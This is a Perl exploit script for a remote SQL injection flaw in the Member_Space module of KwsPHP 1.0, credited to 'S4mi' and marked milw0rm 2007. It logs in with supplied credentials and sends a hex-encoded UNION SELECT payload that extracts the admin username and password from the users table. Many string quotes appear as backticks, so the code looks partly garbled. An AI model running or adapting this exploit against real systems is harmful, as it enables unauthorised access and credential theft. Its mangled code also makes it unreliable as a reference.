KwsPHP 1.0 Member_Space Module SQL Injection Exploit#!/usr/bin/perl

use LWP::UserAgent;
use HTTP::Cookies;

$host = $ARGV[0];
$User = $ARGV[1];
$passwd = $ARGV[2];
$url = `http://`.$host;
$port = `80`;

 print q(
################################################################
#  Script....................: KwsPHP v1.0 Member_Space Module #
#  Script Site...............: http://kws.koogar.org/          #
#  Vulnerability.............: Remote SQL injection Exploit    #
#  Access....................: Remote                          #
#  level.....................: Dangerous                       #
#  Author....................: S4mi                            #
#  Contact...................: S4mi[at]LinuxMail.org           #
#        This Exploit Work Only When magic_quotes_gpc Is OFF   #
################### (C)oded By S4mi ############################

);


 if (@ARGV < 3) {
 print ` #  usage : xpl.pl   host/path/     User Passwd\n`;
 print ` #    e.g : xpl.pl 127.0.0.1/KwsPHP/ zaz luks\n`;
 exit();
 }

   print ` [~] User/Password : $User/$passwd \n`;
   print ` [~] Host : $url \n`;

 $xpl = LWP::UserAgent->new() or die;
 $cookie_jar = HTTP::Cookies->new();
 print ` [~] Logining ...\n`;
 $xpl->cookie_jar( $cookie_jar );
 $login = $xpl->post($url.'index.php',
 Content => [
 `pseudo` => `$User`,
 `pass` => `$passwd`,
 `submit` => `Se connecter`,
 ],); 
 
$evil0 = `\x39\x39\x39\x39\x39\x27\x2F\x2A\x2A\x2F\x55\x4E\x49\x4F\x4E`
		.`\x2F\x2A\x2A\x2F\x53\x45\x4C\x45\x43\x54\x2F\x2A\x2A\x2F\x6E`
		.`\x75\x6C\x6C\x2C\x63\x6F\x6E\x63\x61\x74\x28\x63\x68\x61\x72`
		.`\x28\x31\x31\x37\x2C\x31\x31\x35\x2C\x31\x30\x31\x2C\x31\x31`
		.`\x34\x2C\x31\x31\x30\x2C\x39\x37\x2C\x31\x30\x39\x2C\x31\x30`
		.`\x31\x2C\x35\x38\x29\x2C\x70\x73\x65\x75\x64\x6F\x2C\x63\x68`
		.`\x61\x72\x28\x31\x32\x37\x29\x29\x2C\x63\x6F\x6E\x63\x61\x74`
		.`\x28\x63\x68\x61\x72\x28\x31\x31\x32\x2C\x39\x37\x2C\x31\x31`
		.`\x35\x2C\x31\x31\x35\x2C\x31\x31\x39\x2C\x31\x31\x31\x2C\x31`
		.`\x31\x34\x2C\x31\x30\x30\x2C\x35\x38\x29\x2C\x70\x61\x73\x73`
		.`\x2C\x63\x68\x61\x72\x28\x31\x32\x37\x29\x29\x2C\x6E\x75\x6C`
		.`\x6C\x2F\x2A\x2A\x2F\x46\x52\x4F\x4D\x2F\x2A\x2A\x2F\x75\x73`
		.`\x65\x72\x73\x2F\x2A\x2A\x2F\x57\x48\x45\x52\x45\x2F\x2A\x2A`
		.`\x2F\x69\x64\x3D\x31\x2F\x2A`;

$offset = `\x65\x73\x70\x61\x63\x65\x5F\x6D\x65\x6D\x62\x72\x65\x26\x61`
		 .`\x63\x3D\x63\x61\x72\x6E\x65\x74\x26\x61\x63\x74\x3D\x65\x64`
		 .`\x69\x74\x65\x72\x26\x69\x64\x3D`;

$target = $xpl->get($url.`index.php?mod=$offset$evil0`);



if($target->as_string =~ /value=`username:(.*?`/) {
$zaz = $1;
print ` [+] Exploit succeed! Getting admin information. \n`;
print ` [+] ------------------------------------------- \n`;
}
if($target->as_string =~ /value=`password:(.*?`/) {
$luks = $1;
print ` [+] UserName : $zaz \n`;
print ` [+] Password : $luks \n`;
}
else {
print ` [-] Exploit Failed ! \n`;
}
print `\n#############################################################\n`;

# milw0rm.com [2007-09-15]
